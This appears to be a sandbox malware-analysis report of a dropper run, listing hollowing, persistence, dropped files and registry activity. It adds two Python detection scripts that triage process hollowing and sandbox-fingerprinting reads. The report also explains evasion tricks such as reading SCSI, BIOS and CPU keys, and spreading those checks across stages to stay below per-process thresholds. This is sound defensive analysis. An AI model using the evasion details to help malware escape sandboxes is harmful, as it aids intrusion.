Legitimate hosting services abused for malware hosting/C2 (1 TTP)
cdn.discordapp.com, pastebin.com, t.me and mastodon.online/mastodon.social all appear in the extracted configs above.

Looks up external IP address via web service (14 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  ipinfo.io: flows 14, 15, 129, 130, 174
  api.2ip.ua: flows 131, 132, 184, 190, 275, 283
  checkip.amazonaws.com: flows 121, 329
  ip-api.com: flow 252
Several families query these services for geolocation before deciding whether to run; api.2ip.ua is the lookup STOP/Djvu performs before contacting its C2.

Drops file in System32 directory (6 IoCs)
  SVjvbHJ.exe: File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini
  SVjvbHJ.exe: File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol
  Install.exe: File created C:\Windows\system32\GroupPolicy\gpt.ini
  powershell.exe: File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  powershell.exe: File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  powershell.exe: File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Writing GroupPolicy\Machine\Registry.pol and gpt.ini directly is how local Group Policy is set without the editor, so SVjvbHJ.exe and Install.exe are pushing machine policy; the files under SysWOW64\config\systemprofile show that 32-bit PowerShell ran non-interactively under the SYSTEM account.
Suspicious use of SetThreadContext (19 IoCs)
source pid → target pid: source image → target image
  3620 → 4196: faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe → faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
  3964 → 4552: kdnmdIr2m3Z75rmoxMQY45zR.exe → kdnmdIr2m3Z75rmoxMQY45zR.exe
  3232 → 3840: _az72zCJh0iBWr5dTACKXrws.exe → _az72zCJh0iBWr5dTACKXrws.exe
  2616 → 4688: M52CB.exe → RunDll32.exe
  3784 → 4204: 0BB4J.exe → 0BB4J.exe
  4324 → 5224: kdnmdIr2m3Z75rmoxMQY45zR.exe → kdnmdIr2m3Z75rmoxMQY45zR.exe
  5584 → 5716: kdnmdIr2m3Z75rmoxMQY45zR.exe → kdnmdIr2m3Z75rmoxMQY45zR.exe
  3704 → 3516: sd1gX57A0wItT05S8cNnJS6P.exe → sd1gX57A0wItT05S8cNnJS6P.exe
  4116 → 5624: build2.exe → build2.exe
  4960 → 5984: SETUP_~2.EXE → InstallUtil.exe
  1260 → 5340: 4A1B.exe → 4A1B.exe
  3880 → 6076: 4A1B.exe → 4A1B.exe
  4980 → 3760: build2.exe → build2.exe
  4944 → 4344: CE07.exe → vbc.exe
  4452 → 3972: 3A8A.exe → 3A8A.exe
  4904 → 109088: F576.exe → AppLaunch.exe
  3180 → 1180: DllHelper.exe → InstallUtil.exe
  109144 → 5356: Tal.exe.pif → Tal.exe.pif
  109296 → 1164: Tal.exe.pif → Tal.exe.pif
Rows where source and target share an image name are the suspended-copy-of-self pattern used by packers (the submitted sample and the Djvu process both do it); the rows targeting InstallUtil.exe, AppLaunch.exe, vbc.exe and RunDll32.exe place the payload inside a Microsoft-signed binary, so process-name allowlists do not see it.
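The SetThreadContext table above and the NtCreateUserProcessOtherParentProcess table earlier describe two kinds of process relationship that a detection pipeline wants to triage differently: a process writing the thread context of another (hollowing, either of a copy of itself or of a signed Microsoft host), and a process being created with a parent other than its creator. The following script, added here as an example and not part of the report, parses rows in the report's own format and classifies them. The embedded sample is a constructed subset of the two tables; the HOLLOW_HOSTS and SYSTEM_NAMES lists and the DROPPED subset are my choices, with DROPPED taken from the Executes dropped EXE list.

```python
"""Triage the process-relationship IoCs of a sandbox report: SetThreadContext
rows (process hollowing) and NtCreateUserProcess rows with another parent.
Added example, not part of the report."""
import re
from collections import Counter

# Constructed sample: rows taken from this report's two tables, in their own format.
SAMPLE = """\
PID 3620 set thread context of 4196 3620 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2616 set thread context of 4688 2616 M52CB.exe RunDll32.exe
PID 4960 set thread context of 5984 4960 SETUP_~2.EXE InstallUtil.exe
PID 4944 set thread context of 4344 4944 CE07.exe vbc.exe
PID 4904 set thread context of 109088 4904 F576.exe AppLaunch.exe
PID 5248 created 1624 5248 svchost.exe H4qQ5eq5WgfPy9pgenBRiiaH.exe
PID 5248 created 4588 5248 svchost.exe csrss.exe
PID 5248 created 2892 5248 svchost.exe f801950a962ddba14caaa44bf084b55c.exe
"""

# Image names the report lists under "Executes dropped EXE" (subset).
DROPPED = {"H4qQ5eq5WgfPy9pgenBRiiaH.exe", "csrss.exe", "M52CB.exe", "SETUP_~2.EXE"}

# Names of core Windows processes that malware likes to borrow.
SYSTEM_NAMES = {"csrss.exe", "svchost.exe", "lsass.exe", "smss.exe", "wininit.exe",
                "services.exe", "winlogon.exe", "explorer.exe"}

# Signed Microsoft binaries commonly hollowed to host .NET or native payloads.
HOLLOW_HOSTS = {"installutil.exe", "applaunch.exe", "vbc.exe", "rundll32.exe",
                "regasm.exe", "regsvcs.exe", "msbuild.exe", "aspnet_compiler.exe"}

CTX_RE = re.compile(r"^PID (\d+) set thread context of (\d+) \1 (\S+) (\S+)$")
CREATE_RE = re.compile(r"^PID (\d+) created (\d+) \1 (\S+) (\S+)$")


def triage_thread_context(src_pid, dst_pid, src, dst):
    if src.lower() == dst.lower():
        kind = "self_hollowing"       # suspended copy of itself, image replaced: typical unpacker stage
    elif dst.lower() in HOLLOW_HOSTS:
        kind = "hollow_signed_host"   # payload runs under a Microsoft-signed image name
    else:
        kind = "thread_context_other"
    return {"kind": kind, "pid": int(src_pid), "target_pid": int(dst_pid),
            "image": src, "target": dst, "tags": []}


def triage_other_parent(creator_pid, parent_pid, creator, parent, dropped):
    tags = []
    if parent in dropped:
        tags.append("parent_is_dropped_binary")
        if parent.lower() in SYSTEM_NAMES:
            tags.append("parent_masquerades_as_system_process")
    return {"kind": "other_parent", "pid": int(creator_pid), "target_pid": int(parent_pid),
            "image": creator, "target": parent, "tags": tags}


def triage(text, dropped=DROPPED):
    """Parse both row formats and return one finding dict per row."""
    findings = []
    for line in text.splitlines():
        m = CTX_RE.match(line)
        if m:
            findings.append(triage_thread_context(*m.groups()))
            continue
        m = CREATE_RE.match(line)
        if m:
            findings.append(triage_other_parent(*m.groups(), dropped))
    return findings


def summarize(findings):
    """Count findings by kind."""
    return Counter(f["kind"] for f in findings)


if __name__ == "__main__":
    fs = triage(SAMPLE)
    for f in fs:
        print(f"{f['kind']:22} {f['image']} ({f['pid']}) -> {f['target']} ({f['target_pid']}) {' '.join(f['tags'])}")
    print(dict(summarize(fs)))
```

The parent_masquerades_as_system_process tag is what separates the dropped C:\Windows\rss\csrss.exe from the real csrss.exe in this run; on a live host the same check should compare the image path against System32 rather than rely on a dropped-file list.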
Drops file in Program Files directory 2 IoCs
Processes:
1hObAWF58hoo9_jA8jPWtwDx.exedescription ioc process File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 1hObAWF58hoo9_jA8jPWtwDx.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 1hObAWF58hoo9_jA8jPWtwDx.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeH4qQ5eq5WgfPy9pgenBRiiaH.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\raBkRkUFhLhqVOsAt.job schtasks.exe File opened for modification C:\Windows\rss H4qQ5eq5WgfPy9pgenBRiiaH.exe File created C:\Windows\rss\csrss.exe H4qQ5eq5WgfPy9pgenBRiiaH.exe File created C:\Windows\Tasks\bamNpdvhtkzLwlCraC.job schtasks.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid process 5780 sc.exe -
Detects Pyinstaller 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe pyinstaller C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe pyinstaller C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 29 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2332 1216 WerFault.exe Kog456fPoi_qlj0gOuQ1ue72.exe 3832 1216 WerFault.exe Kog456fPoi_qlj0gOuQ1ue72.exe 2380 1216 WerFault.exe Kog456fPoi_qlj0gOuQ1ue72.exe 2156 1216 WerFault.exe Kog456fPoi_qlj0gOuQ1ue72.exe 4324 1216 WerFault.exe Kog456fPoi_qlj0gOuQ1ue72.exe 5156 1216 WerFault.exe Kog456fPoi_qlj0gOuQ1ue72.exe 5316 1216 WerFault.exe Kog456fPoi_qlj0gOuQ1ue72.exe 5440 2284 WerFault.exe l2S7FrWODIlvtiOh9PM4XNlS.exe 5732 1216 WerFault.exe Kog456fPoi_qlj0gOuQ1ue72.exe 6016 1744 WerFault.exe wd1PHHYFXTO2GwSbYNeKiEhd.exe 4624 3244 WerFault.exe FzbLA0y21wf4Eb_GXZGPAkPK.exe 876 5800 WerFault.exe 50543188494393494002.exe 4292 3608 WerFault.exe Ju38t3w5U8IOhBMX5rcSC6Nn.exe 6044 5436 WerFault.exe tmRoymsFOt7qgiIyaQJKTG0D.exe 1044 3608 WerFault.exe Ju38t3w5U8IOhBMX5rcSC6Nn.exe 4436 3608 WerFault.exe Ju38t3w5U8IOhBMX5rcSC6Nn.exe 2596 3608 WerFault.exe Ju38t3w5U8IOhBMX5rcSC6Nn.exe 5116 5512 WerFault.exe rundll32.exe 3240 3608 WerFault.exe Ju38t3w5U8IOhBMX5rcSC6Nn.exe 6112 3608 WerFault.exe Ju38t3w5U8IOhBMX5rcSC6Nn.exe 5348 3608 WerFault.exe Ju38t3w5U8IOhBMX5rcSC6Nn.exe 3224 3608 WerFault.exe Ju38t3w5U8IOhBMX5rcSC6Nn.exe 452 2476 WerFault.exe explorer.exe 4332 2448 WerFault.exe explorer.exe 5288 4404 WerFault.exe 987E.exe 65324 24408 WerFault.exe FB35.exe 6220 804 WerFault.exe bguuwe.exe 6312 1164 WerFault.exe Tal.exe.pif 7512 7472 WerFault.exe bguuwe.exe -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments: the device instance names under Enum\SCSI carry the disk vendor and model strings, and on a virtual machine those usually name the hypervisor (VirtualBox, VMware and QEMU virtual disks are all recognisable this way).
Processes:
  description     ioc                                               process
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  Itvrzxmax2.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  Itvrzxmax2.exe
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  6DF1.exe
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  8AF1.exe
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  8AF1.exe
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  TUsKZ9i3PovwwAgsSaLpghkJ.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  TUsKZ9i3PovwwAgsSaLpghkJ.exe
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  Itvrzxmax2.exe
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  6DF1.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  6DF1.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  8AF1.exe
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  TUsKZ9i3PovwwAgsSaLpghkJ.exe
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments. On its own ProcessorNameString is a weak signal: installers and telemetry read it too, and on most hypervisors it simply reflects the host CPU. It becomes interesting in combination with the SCSI and BIOS reads reported alongside it.
Processes:
  description        ioc                                                                                 process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  l2S7FrWODIlvtiOh9PM4XNlS.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      FzbLA0y21wf4Eb_GXZGPAkPK.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  FzbLA0y21wf4Eb_GXZGPAkPK.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      build2.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  build2.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      l2S7FrWODIlvtiOh9PM4XNlS.exe
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid   process
  5768  schtasks.exe
  1524  schtasks.exe
  3112  schtasks.exe
  4700  schtasks.exe
  5364  schtasks.exe
  5940  schtasks.exe
  1712  schtasks.exe
  4212  schtasks.exe
  3144  schtasks.exe
  5580  schtasks.exe
  6712  schtasks.exe
-
Delays execution with timeout.exe 2 IoCs
Processes:
  pid   process
  6052  timeout.exe
  3196  timeout.exe
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
  pid     process
  5084    tasklist.exe
  109220  tasklist.exe
-
Enumerates system info in registry 2 TTPs 2 IoCs
SystemProductName under HARDWARE\DESCRIPTION\System\BIOS is the SMBIOS product string; on a virtual machine it usually names the platform outright (for example "VirtualBox" or "VMware Virtual Platform"), which makes it one of the cheapest sandbox checks available.
Processes:
  description        ioc                                                                   process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                    Install.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  Install.exe
-
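The SCSI, processor and BIOS signatures above are three low-severity hits on three different dropped files, which is how a loader that spreads its fingerprinting across stages stays under a per-process threshold. The script below is an added example written for this page, not sandbox tooling: it parses event lines in the report's own "description ioc process" shape, maps each read to a fingerprint category, scores processes by how many categories they touch, and shows what the sample is looking for in the values it reads back. The Itvrzxmax2.exe, build2.exe and Install.exe lines are taken from the tables above; the stage2.exe and setup.exe lines, the category patterns and the VM marker list are constructed for the demonstration.

```python
"""Flag processes whose registry reads match the sandbox-fingerprinting
pattern this report shows (SCSI enumeration, CPU name, BIOS product name),
and test read-back values for hypervisor markers. Added example written for
this page, not sandbox tooling. Event lines are in the report's
'description ioc process' shape; the stage2.exe and setup.exe entries are
invented to exercise the scoring."""
import re
from collections import defaultdict

SAMPLE_EVENTS = r"""
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Itvrzxmax2.exe
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Itvrzxmax2.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI stage2.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString stage2.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer stage2.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName setup.exe
"""

# operation, then the key path (may contain spaces), then the image name.
EVENT_RE = re.compile(
    r"^(Key opened|Key queried|Key enumerated|Key value queried)\s+"
    r"(\\REGISTRY\\.+?)\s+(\S+)$"
)

# Fingerprint categories keyed on the keys this report shows being read.
# Each pattern also accepts the parent key being opened, since a sample
# opens the key before querying the value under it.
FINGERPRINT = {
    "scsi_enum":    re.compile(r"\\Enum\\SCSI(\\|$)", re.I),
    "cpu_name":     re.compile(r"\\CentralProcessor\\0(\\ProcessorNameString)?$", re.I),
    "bios_product": re.compile(
        r"\\DESCRIPTION\\System\\BIOS(\\System(ProductName|Manufacturer))?$", re.I),
}

# Substrings a fingerprinting sample looks for in read-back values
# (constructed list; "VIRTUAL" also catches Hyper-V's "Virtual Machine").
VM_MARKERS = ("VBOX", "VMWARE", "QEMU", "VIRTUAL", "XEN", "HYPER-V")


def parse_events(text):
    """Return (operation, path, process) tuples; malformed lines are skipped."""
    events = []
    for line in text.strip().splitlines():
        m = EVENT_RE.match(line)
        if m:
            events.append(m.groups())
    return events


def classify_events(text):
    """Map each process to the set of fingerprint categories it touched.
    Processes with no fingerprint reads (setup.exe here) are left out."""
    by_proc = defaultdict(set)
    for _op, path, proc in parse_events(text):
        for category, pattern in FINGERPRINT.items():
            if pattern.search(path):
                by_proc[proc].add(category)
    return dict(by_proc)


def flag_fingerprinters(by_proc, min_categories=2):
    """Processes touching at least min_categories distinct categories."""
    return sorted(p for p, cats in by_proc.items() if len(cats) >= min_categories)


def vm_markers(value):
    """Markers present in a ProcessorNameString / SCSI id / SystemProductName."""
    upper = value.upper()
    return [m for m in VM_MARKERS if m in upper]


if __name__ == "__main__":
    by_proc = classify_events(SAMPLE_EVENTS)
    for proc, cats in sorted(by_proc.items()):
        print(f"{proc:32s} {sorted(cats)}")
    print("flagged:", flag_fingerprinters(by_proc))
    print("VBOX HARDDISK ->", vm_markers("VBOX HARDDISK"))
```

Run against the report's own lines only, nothing reaches the two-category threshold: each dropped file reads one family of keys. The practical consequence is to correlate across the dropper's whole process tree (or lower the threshold when the parent is already suspicious) rather than to score each child in isolation.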
Kills process with taskkill 4 IoCs
Processes:
  pid   process
  5628  taskkill.exe
  5268  taskkill.exe
  6060  taskkill.exe
  2176  taskkill.exe
-
Processes:
3A2F1MAI23B9J52.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch 3A2F1MAI23B9J52.exe Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" 3A2F1MAI23B9J52.exe Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Internet Explorer\IESettingSync 3A2F1MAI23B9J52.exe Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" 3A2F1MAI23B9J52.exe Key created 
\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Internet Explorer\Toolbar Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser -
Modifies data under HKEY_USERS 64 IoCs
Processes:
H4qQ5eq5WgfPy9pgenBRiiaH.exepowershell.exepowershell.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central 
Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal 
Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard 
Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe 